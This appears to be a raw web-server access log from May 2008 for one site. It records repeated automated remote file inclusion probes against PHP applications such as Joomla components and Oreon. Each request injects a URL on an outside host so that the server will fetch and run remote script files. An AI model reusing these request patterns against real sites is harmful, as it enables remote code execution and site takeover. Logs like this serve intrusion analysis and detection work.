83.103.23.40 - - [03/May/2008:10:07:55 -0700] "GET //interna.php?meio=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:07:56 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:07:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:08:00 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:08:25 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:08:26 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:08:26 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:08:34 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:08:36 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:08:42 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:08:44 -0700] "GET /logs/access_080308.log/convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:08:44 -0700] "GET /convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:08:44 -0700] "GET /logs/convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:08:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:08:54 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:09:02 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:09:03 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:09:03 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:09:04 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:09:05 -0700] "GET /logs/access_080321.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:09:09 -0700] "GET /logs/access_080213.log/convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:09:11 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.4boarders.sk/eshop/media/57.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:09:37 -0700] "GET /logs/index2.php?showpage=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:09:37 -0700] "GET /index2.php?showpage=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.74.145.135 - - [03/May/2008:10:09:43 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.74.145.135 - - [03/May/2008:10:09:43 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.74.145.135 - - [03/May/2008:10:09:43 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.74.145.135 - - [03/May/2008:10:09:51 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [03/May/2008:10:10:09 -0700] "GET /logs/display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [03/May/2008:10:10:15 -0700] "GET /display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:11:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:11:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:11:44 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:11:48 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:11:48 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:12:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:12:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:12:05 -0700] "GET /logs/access_080321.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:12:22 -0700] "GET /logs/!scanhttp://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:12:25 -0700] "GET /!scanhttp://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:36 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:36 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:36 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:44 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:45 -0700] "GET /logs/access_080315.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:45 -0700] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:45 -0700] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:48 -0700] "GET /logs/access_080315.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:48 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:49 -0700] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:49 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:49 -0700] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:52 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:12:54 -0700] "GET /logs/access_080321.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:56 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:56 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:12:56 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:12:59 -0700] "GET /logs/convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:13:00 -0700] "GET /convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:13:01 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:06 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:07 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:10:13:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:13:11 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:13:12 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:13:15 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:13:17 -0700] "GET /index.php?pag=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:13:17 -0700] "GET /logs/index.php?pag=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:13:26 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.192.72.122 - - [03/May/2008:10:13:46 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.192.72.122 - - [03/May/2008:10:13:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.192.72.122 - - [03/May/2008:10:13:46 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.192.72.122 - - [03/May/2008:10:13:51 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:10:14:14 -0700] "GET /logs//interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:10:14:14 -0700] "GET //interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:14:55 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:10:15:00 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:10:15:01 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:10:15:01 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:20 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:10:15:24 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:10:15:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:10:15:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:10:15:32 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:10:15:35 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:10:15:35 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:10:15:35 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:38 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:10:15:49 -0700] "GET /classes/core/language.php?rootdir=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:52 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:53 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:53 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:54 -0700] "GET /logs/access_080315.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:54 -0700] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:15:54 -0700] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:07 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:08 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:08 -0700] "GET /logs/access_080315.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:09 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:10 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:16:11 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:16:12 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:16:14 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:16:17 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:16:18 -0700] "GET /logs/access_080324.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:16:19 -0700] "GET /logs/access_080324.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:17:00 -0700] "GET /logs/access_080302.log/index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:17:01 -0700] "GET /index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:17:02 -0700] "GET /logs/index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:17:06 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:17:20 -0700] "GET /logs//atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:17:21 -0700] "GET //atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:17:29 -0700] "GET /logs//atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:17:31 -0700] "GET //atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:18:05 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.easy-mart.co.kr/becommunity/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:10:18:27 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:19:00 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.74.145.135 - - [03/May/2008:10:19:11 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:10:19:24 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:19:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:10:19:24 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:10:19:25 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
